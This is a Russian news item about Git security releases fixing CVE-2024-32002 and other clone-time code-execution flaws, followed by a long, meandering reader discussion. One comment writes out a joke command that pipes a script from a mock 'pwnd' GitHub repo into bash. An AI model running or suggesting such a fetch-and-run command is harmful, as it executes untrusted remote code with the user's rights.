Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 и 2.39.4, в которых устранены пять уязвимостей. Наиболее серьёзная уязвимость (CVE-2024-32002), которой присвоен критический уровень опасности, позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone" репозитория, подконтрольного атакующему...Подробнее: https://www.opennet.dev/opennews/art.shtml?num=61180
Для симлинков в винде нужны права администратора.
Вернее не права администратора, а SeCreateSymbolicLinkPrivilege (которая обычно даётся при "Запустить от имени админестратора").
найди мне модного современного разработчика-под-линукс не выклянчившего/вымутившего/вышантажировавшего себе админских прав на своей вянде?
Ну я, чо дальше? :
Непонятно, зачем нужен эксплойт, если можно сказать ему запустить `curl https://github.com/jiatan/pwnd/blob/master/install.sh | bash', и он запустит
Между git и curl | bash большая разница. Человек, запускающий curl | bash, понимает, что запустит код. А при клонировании git-репозиториев код должен только скачиваться, но не запускаться - но таки запускается. Это как если бы при просмотре специально подготовленной картинки все куки из браузера отправлялись кому не надо.
>Человек, запускающий curl | bash, понимает, что запустит код.но если скрипт больше 5 строчек, то проверять всё равно лень
"Две большие разницы" - заинтересовать запуском скрипта и заинтересовать просмотром кода.Скрипты запускают неинтересные хомки.
А почитать код любят куда более интересные люди.
Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с шифррвальщиками с варезника нацеплял, или что?
варианта с отсутствием венды не рассматривали совсем? по какой причине?
> варианта с отсутствием венды не рассматривали совсем? по какой причине?Ну, иногда ж работать приходится, а не только конфиг vim'а вылизывать - и если эта работа не сводится к "программировай-администрировай!" (И то - с нюансами) или там "в одной единственной программе кнопка нажимай"\"уеб-интерфейс ковыряй" - то тут ээээ... без вариантов кагбэ.
Банально по скупь4бузинесс с клиентом пообщаться - уже чаллендж, в аутлуке переговорку забронировать - импоссибля, по VPN'у с комплаенс-чеком куда-то подключиться - удачи, сынок! (Оно и с виндой-то не любой и не везде сунешься - для того же "Сибура" у меня вон - отдельный букварь на столе стоит с отдельным etoken'чиком...) Да чо там - банально, пару правок в сверстанный в word'е по ГОСТу проект внести из этого вашего совсем-совсемлибреописа - может превратиться в увлекательное приключение на пару дней для всех участников совместной работы... И вот кому оно "надь"?
WSL2 примерно 100% рабочих задач покрывает - а если уж совсем "Пепел Клааса стучится" - в тот же hyper-v можно обычную виртуалку забабахать и инжоиться чувством нитакусичности...
Ну не знаю. Винды не видел уже года с 2009-го, в последнее время вообще ни с чем никаких проблем не возникало даже с заказчиками с виндовой инфраструктурой. MS Teams и прочие аутлуки-офисы через веб нормально работают, AnyConnect под Линукс есть, кривой, но работает. Скайп в последний раз заказчик использовал 8 лет назад, тогда он работал, и уже тогда это воспринималось как что-то ретроградное.JetBrain-овские IDE с тех пор, как они начали с собой таскать свой патченный JRE (давно), под Линуксом работает вообще без нареканий (были, разве что, небольшие проблемы с монитором с нестандартным devicePixelRatio). Докер нативный, никаких проблем с производительностью I/O, как на Маке или Винде с дополнительной прослойкой виртуализации, нет по определению.
Насчёт всяких ГОСТов, это, к счастью, мне не грозит, но уж у вас-то там в вашей ситуации точно стрёмно завязываться на зарубежного вендора.
>[оверквотинг удален]
> нормально работают, AnyConnect под Линукс есть, кривой, но работает. Скайп в
> последний раз заказчик использовал 8 лет назад, тогда он работал, и
> уже тогда это воспринималось как что-то ретроградное.
> JetBrain-овские IDE с тех пор, как они начали с собой таскать свой
> патченный JRE (давно), под Линуксом работает вообще без нареканий (были, разве
> что, небольшие проблемы с монитором с нестандартным devicePixelRatio). Докер нативный,
> никаких проблем с производительностью I/O, как на Маке или Винде с
> дополнительной прослойкой виртуализации, нет по определению.
> Насчёт всяких ГОСТов, это, к счастью, мне не грозит, но уж у
> вас-то там в вашей ситуации точно стрёмно завязываться на зарубежного вендора.Ну в общем хотелось бы как-то так - но по роду деятельности встречаются всякие ушибнутые инфобезом в тяжкой степени - teams on prem нет - давай skype4b(!=skype), а то и вовсе bitrix, OWA - харам, и даже с телефона почта только через vmware'вскую BYOD-примочку, o365 - облачный - пшелнафиг, VPN? Лехко - но только после проверки, что диск зашифрован, установлены апдейты безопасности, антивирус из белого списка с обновленными базами и разрешенное к использованию ПэО и та дэ и та пэ. У нас жеж тут все больше Критическая Информационная Инфраструктура, а не ларек по продаже кока-колы(Ц)
При этом "зарубежность" вендора парадоксальным образом никого по большому счету не напрягает - такой вот плюрализм мненьев в отдельно взятой голове.
А, ну да, с такими тяжело. Сочувствую. Я предпочитаю работать с малым-средним частным бизнесом, стартапами сегодняшними или вчерашними. Интересной работы много, платят хорошо, когда понимают за что (за результат качественно и в срок), мозги никто не компостирует. Да, есть и минусы - бизнес может прогореть, стартап может не получить очередой раунд инвестиций, ну и ладно, другие довольно быстро найдутся.
> А, ну да, с такими тяжело. Сочувствую. Я предпочитаю работать с малым-средним
> частным бизнесом, стартапами сегодняшними или вчерашними. Интересной работы много, платят
> хорошо, когда понимают за что (за результат качественно и в срок),
> мозги никто не компостирует.Вот, еще 1 анон понимает прелести подобных направлений. А ты дорогой user наслаждайся своими наручниками с батареей, рассказывая как там цепь не должна быть длинной, и вообще, гестапа рулит, типа. Пусть у таких как user и рулит - и так им и надо! :)
> Да, есть и минусы - бизнес может прогореть, стартап может не получить очередой
> раунд инвестиций, ну и ладно, другие довольно быстро найдутся.Стартапа конечно может постичь факап, но если не идиотничать - это не является чем-то фатальным. А бонусом вон тот лох - в офисе сидит. А я пошлю всех в пень на время да покручу педальки на веле, на свежем воздухе, в красивом пейзаже, если погода способствует. По сравнению с пыльным офисом... сами понимаете...
Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы.
С возрастом понимаешь (Ну... я - понял), что они не сводятся к "выбору инструмента" (Году в 10м для меня это был принципиальный вопрос, кстати - я занимался импортозамещением еще когда это не было мейнстримом :)) а болтаются большей частью ну вот вообще не в технической плоскости.
Кстати, заниматься шоссейным велоспортом работа в энтерпрайз-энтерпрайзе вот никак не мешает, честно. Во времена не столь отдаленные вот и вовсе триатлоном за корп. счет (по слот на айронмен включительно) страдал... ну или наслаждался, тут уже даже не знаю, как правильней ;)
> Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы.Опция жить как рабу - мне чем-то не нравится.
> С возрастом понимаешь (Ну... я - понял), что они не сводятся к
> "выбору инструмента" (Году в 10м для меня это был принципиальный вопрос,Я понял что возможность пойти поплавать, на веле погонять, или что я там хотел, пока на тебя орет тупарь-шеф, ты примотан к своему офисному креслу цепью под угрозой увольнения, и проч, таки нехилый апгрейд качества жизни, имхо. Да, некоторые решения могут мне стоить денег или репутации, но это мои решения. А если я не хочу делать энный таск - хрен что сделаешь, кроме поиска другого исполнителя. Для меня это важно, это мой психологический комфорт.
> кстати - я занимался импортозамещением еще когда это не было мейнстримом
> :)) а болтаются большей частью ну вот вообще не в технической плоскости.Я рад за вас, все такое, все дела, yada-yada...
> Кстати, заниматься шоссейным велоспортом работа в энтерпрайз-энтерпрайзе вот никак не
> мешает, честно.Лично я горняки предпочитаю. Чтобы крутить не по в@нючему шоссе а - почти везде, и с более симпотным пейзажем. А энтерпрайзы большие, не особо гибкие, доставучие, от несимпатичного таска можно отделаться только радикальным увольнением иной раз. Ну их нафиг.
> за корп. счет (по слот на айронмен включительно) страдал... ну или
> наслаждался, тут уже даже не знаю, как правильней ;)Думаю что мне в энтерпрайзах не нравится кое-что другое. Общий климат в них и интрузивность в личную жизнь в паре с негибкостью. То что получается - сложно называть свободным человеком.
>> Ну в общем не буду спорить - все так и есть. У каждого выбора свои плюсы и свои минусы.
> Опция жить как рабу - мне чем-то не нравится.
> Я понял что возможность пойти поплавать, на веле погонять, или что я
> там хотел, пока на тебя орет тупарь-шеф, ты примотан к своему
> офисному креслу цепью под угрозой увольнения, и проч, таки нехилый апгрейд
> качества жизни, имхо. Да, некоторые решения могут мне стоить денег или
> репутации, но это мои решения. А если я не хочу делать
> энный таск - хрен что сделаешь, кроме поиска другого исполнителя. Для
> меня это важно, это мой психологический комфорт.Я кажись понял, в чем тут у нас расхожденья. Пред-по-ла-гаю, что если карьеру начинать с какой-нибудь "поддержки-рабочих-мест" пятачок-за-пучок или там "личинки погроммизда" стажером после института - то оно как-то так и может выглядеть. В плохом месте, ага.
А если попасть в совсем-совсем тырдырпрайз с уровня ну хотя бы среднего звена менеджера (Про архитектора, руководителя направления и т.д - не говорю) - все выглядит мал-мала иначе. Нет, бывают совсем упоротые места ("Приходить на работу в 08:00 - ваша обязанность, задерживаться до 20:00 - ваше право"(С), своими ушами слышал) - но в них и впрямь, незачем работать.
/Слушать ор тупаря-клиента это конечно совсем-совсем другое, да./>> Кстати, заниматься шоссейным велоспортом работа в энтерпрайз-энтерпрайзе вот никак не
>> мешает, честно.
> Лично я горняки предпочитаю. Чтобы крутить не по в@нючему шоссе а -
> почти везде, и с более симпотным пейзажем. А энтерпрайзы большие, не
> особо гибкие, доставучие, от несимпатичного таска можно отделаться только радикальным
> увольнением иной раз. Ну их нафиг.2,5 размеченные XC'шные трассы + 1 даунхильная на город-миллионник. Ну, еще пара лыжных баз, да. В общем, если "за спорт" - то в шоссе видового туризма(ТМ) кратно больше. На урале, по крайней мере.
Если про "покатушки", то MTB и вправду удобней - но когда я понял, что 80% времени на подвесе качу по асфальту - продал и его и хардтейл. Была мысля про гравел - но чот наверное уже и не соберусь.> Думаю что мне в энтерпрайзах не нравится кое-что другое. Общий климат в
> них и интрузивность в личную жизнь в паре с негибкостью. То
> что получается - сложно называть свободным человеком.Нуууу... на низовых должностях скорее наоборот - приехал на заводском басике к началу смены - в конце смены на ём же уехал, и спроса с тебя - ну вот ровно никакого. На половину долюбок можешь смело ссылаться на свою ДИ - нет у них методов супротив Костей Сапрыкиных.
Выше + проектная деятельность, а не линейка - уже да. Ненормированный рабочий день, "роди-и-скажи-что-украл" вот это всё - но тут скорее всего и не в энтерпрайзе схожего уровня так же. Ту же удаленку с уровня "менеджера среднего звена" или там "эксперта по направлению" в большинстве мест - вообще не вопрос, даже при специфике работы, требующей периодического присутствия на площадке какую-нибудь 3\2 для ИТшника организовать согласятся примерно "везде".
Вот стремление влезть куда не просят - наличествует примерно "всегда". А давайте-ка организуем вам медосмотр с диспансеризацией - вот прям исключительно в ваших интересах - но отказаться нельзя. И на первомайскую демонстрацию - у нашего предприятия традиция с тыща-девясот-двасать-лохматого-года - все ходят. Да, скажите пожалуйста, как и когда вы планируете голосовать? Срок заполнения опросного листа - сегодня до 12 МСК! А после голосования - сообщите специально выделенному человеку для внесения в список, цель по предприятию - 85% проголосовавших в первый день(Ц). Бесит, но не сильно, с этим 1,5 раза в год сталкиваешься. Рассея-с.
Всякие чисто corporate-скиллы, которые не переносятся и на каждом месте разные - бесят кратно сильнее. Да рот я любил ваши особенности бюджетирования проектов в SAP. И специфику учета лицензий - туда же. И закупочные процедуры. А особенности электронного документооборота в directum - ах, у вас documentum, и "этадругое!" - и вовсе в зад. А процедуру оформления командировок с заказом билетов\оформлением отеля из списка одобренных через электронную систему деловых путешествий(ТМ) - так уж и быть, любил традиционным способом, вместе с последующей отчетностью.
А, еще из бесявого - всякая постановка целей (А как ваши личные цели связаны с целью подразделения? А цели подразделения - с задачами предприятия? Аааа... Уууу... А как задача Х SMART'уется? Вы не думали, что...) и "индивидуальные планы развития" с "карьерными треками" и вот этим всем. И не дай б-же встрянешь в какое моднючее 5С с бережливым производством - тут правда может оказаться проще уволиться нафиг, чем этих сектантов удовлетворять.Но если так подходить - в любом сегменте свои бесячие приколюхи будут
> мешает, честно. Во времена не столь отдаленные вот и вовсе триатлоном
> за корп. счет (по слот на айронмен включительно) страдал... ну или
> наслаждался, тут уже даже не знаю, как правильней ;)p.s. и да, ты не можешь себе даже близко представить как я ненавижу все эти твои "аттестованные рабочие места" и прочий ультра-хардкор булшит. Это такое вторжение и рабство что - покорно благодарю - но с таким я не "agree" и никогда не буду. И у меня достаточно бабок чтобы купить себе "средства производства" в вот именно лично мою собственность. Без выслушивания булшита что этот комп собственность фирмы, блаблабла.
>> мешает, честно. Во времена не столь отдаленные вот и вовсе триатлоном
>> за корп. счет (по слот на айронмен включительно) страдал... ну или
>> наслаждался, тут уже даже не знаю, как правильней ;)
> p.s. и да, ты не можешь себе даже близко представить как
> я ненавижу все эти твои "аттестованные рабочие места" и прочий ультра-хардкор
> булшит. Это такое вторжение и рабство что - покорно благодарю -
> но с таким я не "agree" и никогда не буду. И
> у меня достаточно бабок чтобы купить себе "средства производства" в вот
> именно лично мою собственность. Без выслушивания булшита что этот комп собственность
> фирмы, блаблабла.Ну, не всем же в ларьке по продаже кока-колы, работать, да? Кому-то вот приходится и задницу бумажками прикрывать - ответственность перекладывать, будем с пониманием относиться к проблемам инфобезников, ага? Вопрос не в "достаточно"\"не достаточно" бабок на покупку ПК, а в том, кто случись что турма сидеть будет. У монтажника может быть тоже денег на стремянку из леруа мерлен хватит - но за попытку затащить её на территорию он гарантированно получит двойную дозу решительных звиздюлей, ибо.
Есть ведь и фронтендеры на удалёнке. Переговорки не актуальны, с заказчиками общается менеджер, по vpn ходит бэкендер, госты вообще в последний раз были в универе ещё до Медведева.
> Есть ведь и фронтендеры на удалёнке. Переговорки не актуальны, с заказчиками общается
> менеджер, по vpn ходит бэкендер, госты вообще в последний раз были
> в универе ещё до Медведева."если эта работа не сводится к "программировай-администрировай!"(И то - с нюансами)"(Ц)
> Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с
> шифррвальщиками с варезника нацеплял, или что?небось как тот инженер у нас - "а я уже диск отформатировал, дайте установочный, пазазя".
Видимо что-то там такое было, что нам показывать никак нельзя.
Никого не волнует что там в винде происходит
То ли дело 2%, ага.
~4.8% без учёта ChromeOS
https://radar.yandex.ru/desktop утверждает иное: 2.77% всего недесктопного кроме винды и макоси. В общем на уровне погрешности измерений.
Ага, и все в этой статистике - разработчики, использующие git :-)Даже на Винде, скорее всего, половина пользуются гитом внутри WSL.
На кой? Конкретно у меня под виндой гит нативный стоит, а не в виртуалке с ненужным. За всех остальных говорить не буду, но скорее всего то же самое.
> Даже на Винде, скорее всего, половина пользуются гитом внутри WSL.на винде гит встроен в visual studio (не шва6одкину подделку а настоящую)
Прям при запуске спрашивает тебя - откуда тебе начекаутить и куда потом пульнуть. "проекты" в "новаяпапка 244" у MS давно уже немодно, они развивают технологии.
Ко встроенным эта уязвимость не относится же? Или там не что-то вроде libgit2, а тупо консольный git с собой таскают и exec-ают?
> Ко встроенным эта уязвимость не относится же? Или там не что-то вроде
> libgit2, а тупо консольный git с собой таскают и exec-ают?да скорее всего именно консольный, вдруг тебе понадобится что-то нестандартное сделать, и ты его руками захочешь запустить. Или он окажется внутри cmake'ового макроса (да, студия еще и cmake имеет внутре)
> на винде гит встроен в visual studio (не шва6одкину подделку а настоящую)это какой-то позор. Такая огромная компания с миллиардными доходами и полной монополией на десктоп с начала 1990х годов и юзают какую-то поделку одного человека. При том что всю своб жизнь занимались дискредитацией и поливанием опенсорса. А тут на тебе, встроили вражеский гит себе. Хахаха, позорище. А что не свой позорный TFS?
ну да, ну да, одного. Пара сотен разработчиков (кажется, кто-то работал на MS) не в счет ведь."в очередной раз microsoft сделала для опесорса за день больше чем все л@п4@тые за всю жизнь" - например, когда добавила туда LFS extension.
Можно в режим разработчика перевести, тогда не нужны. Правда нужны права на сам перевод.
> приведёт к выполнению этих hook-овХуки -- мерзотнейшая штука. Сразу вырубаю эту херню к чертям собачьим. К примеру, в веб-проектах хуки устанавливаются таким куском фекалий, как npm-пакет husky. Прикиньте, делаю гит коммит, не имея nodejs в $PATH, и тут вдруг гит ругается, что хук ругается, что nodejs не найден. Я на такое как бы не подписывался, какого ху_ гит запускает какой-то васянский код при гит-коммите? Ах да, postinstall-скрипты тоже надо вырубать нахрен через .npmrc. Если вы этого не сделали, любой васян из интернета сможет запускать код под вашими правами и воровать ваш ~/.config/chromium. Посчитать, скольки васянам вы даете полные права на вашу систему: find node_modules -name package.json | wc -l
>хуки устанавливаются таким куском фекалий, как npm-пакет huskyТак и запишем: "вредоносное ПО".
>> хуки устанавливаются таким куском фекалий, как npm-пакет husky
> Так и запишем: "вредоносное ПО".NPM состоит из него чуть менее чем полностью. И репа и сама эта штука.
Так тут не git, а npm пачкает все фекалиями
> Так тут не git, а npm пачкает все фекалиямипачкают, зачастую, cильно умные проггеры-олимпиадники
Мол, а давайте, чтобы был не просто коммит, а ещё и целая куча гомна исполнялась, которая может падать при любом чихе и код заливаться не будет. А, где нет залитого кода - там нет и начала сборки по событию в рамках СИ/СД. Разумеется, с подтягиванием горы пакетов, включая устаревшие и не очень-то работающие где-то кроме одной-единственной ОС одной конкретной версииВ итоге, задача на 15 мин запросто превращается в задачу на день с ковырянием даром ненужной ерунды, а то и несколько дней, если предстоят выходные и праздники
Так это касается любых языков программирования и систем сборки и репозиториев и любых пакетов дистрибутива - там тоже выполняются postinstall bash-портянки, только от рута уже.Проблема в ужасной "безопасности" Linux для десктопов. Когда любой Вася получает доступ ко всему home. Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет.
это касается не только Linux
>Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет.Ага, только если вовремя заметил/догадался, что это срочно необходимо сделать.
Стандартные пакеты ревьювят, а хлам от JS мaкaк - нет
NPM по хорошему в докер убирать надо.
Попрошу ещё поглубже, пожалуйста
Докер стоит денег. И в целом от этой проблемы вас не спасёт.
> NPM по хорошему в докер убирать надо.А там бэкдор типа нещитово? :)
> Хуки -- мерзотнейшая штукаАбсолютно солидарен! ЛЮБОЙ формат, позволяющий "немножко скриптогадить", фтопку. Я удивился, что даже шрифты(!!!!) могут исполнять код - вот уж где крыса навнедряла!
Это всё привет от технологий начала 80-х, когда засунуть везде свой Тьюринг-полный DSL казалось прекрасной идеей - гибко же ж. До червя Морриса оставалось ещё 5 лет.
> позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone"позволяет добиться выполнения кода при выполнении кода // fixed
> Клонирование этого репозитория приведёт к выполнению кода с правами пользователя, выполняющего операцию клонирования.
выполнению кода с правами пользователя, выполняющего код // fixed
Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого клонирования репозитория тебе еще неожиданно сносят хомяк.
> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого
> клонирования репозитория тебе еще неожиданно сносят хомяк.не, ну вот сносить-то зачем? Чо вы как эти вот самые. Не сносить а добавить. Строчечку в authorized_keys , парочку сервисов, ну еще по мелочи.
>> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого
>> клонирования репозитория тебе еще неожиданно сносят хомяк.
> не, ну вот сносить-то зачем? Чо вы как эти вот самые. Не
> сносить а добавить. Строчечку в authorized_keys , парочку сервисов, ну еще
> по мелочи.Да нафиг, каждому горе майнтайнеру - по мaйнeру! А такие как ты даже и добровольно запустят, если процент предложить. Главное чтобы шеф не спалил что кошель твой.
> А такие как ты даже и добровольно запустят, если процент предложить.у тебя бабла не хватит покрыть все риски и косвенные ущербы. А я умею считать.
> Главное чтобы шеф не спалил что кошель твой.
главное чтоб шеф не узнал про краденные тележки в Кельне.
>> А такие как ты даже и добровольно запустят, если процент предложить.
> у тебя бабла не хватит покрыть все риски и косвенные ущербы. А я умею считать.Да вот хрен там. Если бы ты реально умел считать, сделал бы это все в 2009, а сейчас - махал бы всем тут факом, через старлинк какой, попивая дорогое бухлецо на своей личной яхте... ну или по крайней мере мог бы не работать до гроба жизни, ощущая себя белым человеком, если так светиться успехом счета обломно. И локация была б поприличнее, без бддлогопов "в товарном количестве".
>> Главное чтобы шеф не спалил что кошель твой.
> главное чтоб шеф не узнал про краденные тележки в Кельне.Что еще за тележки?
Я помню в одной конторе настроили хуки так что оно писало об изменениях в программе в slack (пока этот чат не стал платным для владельца). Двоякое ощущение - вроде бы и удобно для менеджмента, а вроде бы как и не очень - отвлекало немного. А ещё когда делают процесс с код-ревью и мелкими задачами, так вообще не айс.
Так это обычно в отдельный канал в Слаке делают. Я это сразу в mute отправляю, намного гибче через email с уведомлениями по фильтрам только на нужное. Ну кому-то удобно, пусть читают, я ж не против.
> например, используемых по умолчанию в Windows и macOSТот кто писал, явно не работал с macOS
Ну вообще-то apfs которая используется на системном диске как раз case insensitive. Так что если ты застрял на hfs+ со своим макбуком 2008 года с авито, то с разморозочкой.
А я-то думал, откуда это лишение фич прогрессом обзывают. А оно вон как, the usual suspects. Не сидится им на маке почему-то.
> лишение фичИ опять ты пaльцeм в гyзнo попал 😆 Но даже не буду oбъяcнять почему, уж извольте-с.
> А я-то думал, откуда это лишение фич прогрессом обзывают.это добавление. Наконец-то системе объяснили что никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то же. Это в 70м году никак невозможно было такую сложную логику уместить в 16k
Но есть нюанс...
>никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то жеВсегда делаю в шелле для обхода окружений алиасы/функции вида CP, INSTALL, SH. Страдайте.
Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте. Выбор макоси разработчиком такой же признак проф непригодности, как и выбор винды
> Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте.
> Выбор макоси разработчиком такой же признак проф непригодности, как и выбор
> виндыпрофпригодный подвальный пришел порассуждать о выборах разработчиков.
Тебя от канализационной трубы-то вообще кто отцепил?
> Выбор макоси разработчиком такой же признак проф непригодностиНастоящий труЪ погромистЪ должОн сидеть на коредуба с и дебьяне с крысой? Ннада так полагать? 🌚
Вставлю своё примечание в ваш разговор в ответ именно на это сообщение - на gentoo или arch в таком уж случае. А в целом настоящий программист? Смешно звучит. Это как у баб - настоящий мужик должен...
О, а что вы скажете о пользователях айфона и маках? Полагаю именно это клиенты этого американского подделия и именно для них сей человек программирует.
И две смешные
А вот у меня вопрос - откуда столько версий git ? Аж 7 в этой новости насчитал. Типа для каждого питона свой гит ?
> А вот у меня вопрос - откуда столько версий git ? Аж
> 7 в этой новости насчитал. Типа для каждого питона свой гит
> ?для некоторых можно и не жадничать, и использовать два - например для самого питона один а для модулей еще оди... четыре. Что мы, жадные что ли?
> Уязвимость проявляется только в файловых системах,
> не различающих регистр символовА можно это объявить фичой и не чинить? Прикольно же когда всяких маздайищков можно нагреть по первое число. Я бы с удовольствием комитнул кому-то типа поха чего-нибудь веселое.
Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего. А в файлухах ненужного её можно выключить?
> Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего.Ну и какой % юзеров это делает? Вот и ответ на вопрос "сработает ли эксплойт?" :)
> А в файлухах ненужного её можно выключить?
В некоторых таки - можно. Но желающие этсамого как раз и откушают наравне с вон теми. И поделом. Ибо когда возникает неоднозначность маппинга "для удоьства" - вы таки конкретно нарываетесь по линии безопасности. Это не первый вулн и не последний. В софте это поведение неудобно учитывать. Прогеры налетали, налетают и будут налетать на этом. Они просто забывают предусмотреть такую ситуацию.
Начиная с Windows 10 сборки 17107 чувствительность к регистру можно включить даже для конкретного каталога:fsutil.exe file setCaseSensitiveInfo <path> enable
> Уязвимость проявляется только в файловых системах, не различающих регистр символов...Это же фича, а не баг